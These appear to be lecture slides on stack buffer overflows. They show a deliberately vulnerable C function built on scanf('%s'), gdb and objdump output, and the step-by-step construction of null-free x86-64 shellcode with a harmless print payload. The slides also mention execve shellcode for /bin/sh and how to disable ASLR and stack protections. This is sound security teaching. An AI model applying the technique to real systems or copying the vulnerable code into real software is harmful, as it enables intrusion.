Aaron Bloomfield (aaron@virginia.edu)
@github | ↑ |
Source code: overflow.c (in HTML)
void vulnerable() {
char buffer[100];
/* read string from stdin */
scanf("%s", buffer);
do_something_with(buffer);
}
What if we input a 1000 character string?
$ cat 1000-as.txt
aaaaaaaaaaaaaaaaaaaaaaaa (1000 a’s total)
$ ./overflow.exe < 1000-as.txt
Segmentation fault (core dumped)
$
$ gdb ./overflow.exe
GNU gdb (Ubuntu 8.1-0ubuntu3) 8.1.0.20180409-git
Reading symbols from ./overflow.exe...done.
(gdb) run < 1000-as.txt
Starting program: ./overflow.exe < 1000-as.txt
Program received signal SIGSEGV, Segmentation fault.
0x000000000040059c in vulnerable () at overflow.c:14
14 }
(gdb) bt
#0 0x000000000040059c in vulnerable () at overflow.c:14
#1 0x6161616161616161 in ?? ()
#2 0x6161616161616161 in ?? ()
...
#121 0x0000000000000000 in ?? ()
(gdb)
Source from gcc -S
: overflow.s (in HTML)
vulnerable:
sub rsp, 120 ; allocate space for buffer
movabs rdi, offset .L.str.1 ; arg 1 to scanf() is "%s"
lea rsi, [rsp + 16] ; arg 2 to scanf() is buffer
mov al, 0 ; set eax = 0
call __isoc99_scanf ; call scanf()
lea rdi, [rsp + 16] ; arg 1 to do_s_w(): buffer
mov dword ptr [rsp + 12], eax ; we can ignore this
call do_something_with ; call "do_s_w"
add rsp, 120 ; deallocate stack space
ret ; goodbye!
From objdump -d overflow.exe
:
0000000000400570 <vulnerable>:
400570: 48 83 ec 78 sub $0x78,%rsp
400574: 48 bf 44 06 40 00 00 movabs $0x400644,%rdi
40057b: 00 00 00
40057e: 48 8d 74 24 10 lea 0x10(%rsp),%rsi
400583: b0 00 mov $0x0,%al
400585: e8 b6 fe ff ff callq 400440 <__isoc99_scanf@plt>
40058a: 48 8d 7c 24 10 lea 0x10(%rsp),%rdi
40058f: 89 44 24 0c mov %eax,0xc(%rsp)
400593: e8 a8 ff ff ff callq 400540 <do_something_with>
400598: 48 83 c4 78 add $0x78,%rsp
40059c: c3 retq
40059d: 0f 1f 00 nopl (%rax)
00000000004005a0 <main>:
4005a0: 50 push %rax
4005a1: c7 44 24 04 00 00 00 movl $0x0,0x4(%rsp)
4005a8: 00
4005a9: e8 c2 ff ff ff callq 400570 <vulnerable>
4005ae: 31 c0 xor %eax,%eax
4005b0: 59 pop %rcx
4005b1: c3 retq
4005b2: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1)
4005b9: 00 00 00
4005bc: 0f 1f 40 00 nopl 0x0(%rax)
(You can see the full objdump)
Before scanf()
is called:
After scanf()
is called: the buffer hath overflowed:
The return address (and beyond) has also been overwritten:
Source from gcc -S
: overflow.s (in HTML)
vulnerable:
sub rsp, 120 ; allocate space for buffer
movabs rdi, offset .L.str.1 ; arg 1 to scanf() is "%s"
lea rsi, [rsp + 16] ; arg 2 to scanf() is buffer
mov al, 0 ; set eax = 0
call __isoc99_scanf ; call scanf()
lea rdi, [rsp + 16] ; arg 1 to do_s_w(): buffer
mov dword ptr [rsp + 12], eax ; we can ignore this
call do_something_with ; call "do_s_w"
add rsp, 120 ; deallocate stack space
ret ; goodbye!
ret
opcode tried to return to 0x6161616161616161, which is not in the memory allocated to the program
buffer
$ gdb ./overflow.exe
GNU gdb (Ubuntu 8.1-0ubuntu3) 8.1.0.20180409-git
...
Reading symbols from ./overflow.exe...done.
(gdb) break overflow.c:11
Breakpoint 1 at 0x400583: file overflow.c, line 11.
(gdb) run
Starting program: ./overflow.exe
Breakpoint 1, vulnerable () at overflow.c:11
11 scanf("%s", buffer);
(gdb) print &buffer
$1 = (char (*)[100]) 0x7fffffffdce0
(gdb)
After a successful buffer overflow exploit:
puts()
via a tricky jump: leal string(%rip), %edi
pushq $0x4004e0 ; address of puts() in
; target executable
retq
string:
.asciz "You have been infected with a virus!"
Note that this is in AT&T assembly syntax
section .data
string db "You have been infected with a virus!", 0x0a
section .text
lea edi, [string]
push 0x4004e0 ; address of puts() in
; target executable
ret
We’ll eventually convert this to shellcode (of a sort)
nasm -f elf -o test.o test.s
(for Intel syntax)as -o test.o test.s
(for AT&T syntax)objdump -d a.out
-f elf64
flag, then run through objdump -d
. The result:The assembly:
section .data
string db "You have been infected with a virus!", 0x0a
section .text
lea edi, [string]
push 0x4004e0 ; address of puts() in
; target executable
ret
But what if we don’t know where puts()
is?
syscall
opcodesyscall
callsglobal mysyscall
section .data
string db "You have been infected with a virus!", 0x0a
section .text
mysyscall:
mov eax, 1 ; syscall function (sys_write)
mov edi, 1 ; print to stdout
lea esi, [string] ; buffer to print
mov edx, 37 ; size of buffer
syscall
ret
This can be compiled (with nasm -f elf64
), linked with an appropriate main()
function, and used to print out the above string.
The assembly yields the following machine code
mov eax, 1 ; syscall function (sys_write)
mov edi, 1 ; print to stdout
lea esi, [string] ; buffer to print
mov edx, 37 ; size of buffer
syscall
ret
The hex code:
0: b8 01 00 00 00 mov $0x1,%eax
5: bf 01 00 00 00 mov $0x1,%edi
a: 8d 34 25 00 00 00 00 lea 0x0,%esi
11: ba 25 00 00 00 mov $0x25,%edx
16: 0f 05 syscall
18: c3 retq
Note that nothing is 64-bit (even when compiled with -f elf64
)
syscall
reads the entire 64-bit rax register
mov rax, 1
, not a mov eax, 1
syscall
syscall
to do so:global mysyscall
section .data
string db "You have been infected with a virus!", 0x0a
section .text
mysyscall:
mov eax, 1 ; syscall function (sys_write)
mov edi, 1 ; print to stdout
lea esi, [string] ; buffer to print
mov edx, 37 ; size of buffer
syscall
mov eax, 60 ; syscall function (sys_exit)
xor edi, edi ; exit value (0)
syscall
The machine code:
0: b8 01 00 00 00 mov $0x1,%eax
5: bf 01 00 00 00 mov $0x1,%edi
a: 8d 34 25 00 00 00 00 lea 0x0,%esi
11: ba 25 00 00 00 mov $0x25,%edx
16: 0f 05 syscall
18: b8 3c 00 00 00 mov $0x3c,%eax
1d: 31 ff xor %edi,%edi
1f: 0f 05 syscall
How do we use this as input to the program?
scanf()
and %sThe assembly on the previous slide results in:
26: 31 c0 xor %eax,%eax
28: b0 01 mov $0x1,%al
2a: 89 c7 mov %eax,%edi
2c: 8d 35 d0 ff ff ff lea -0x30(%rip),%esi
32: 31 d2 xor %edx,%edx
34: b2 24 mov $0x24,%dl
36: 0f 05 syscall
38: b0 3c mov $0x3c,%al
3a: 31 ff xor %edi,%edi
3c: 0f 05 syscall
Note that the lea
loads an negative offset, which has no 0x00 bytes
We put all that together, and we get:
stub_execve
(set rax to 59), you can execute any command/bin/sh
in 27 bytes-R
flag to setarch
-L
flag to setarch
bash
is the shell, and you don’t have to run the setarch
command each time you want to run a program-R
disables ASLR, and -L
allows execution on the stack-fno-stack-protector
flag when compiling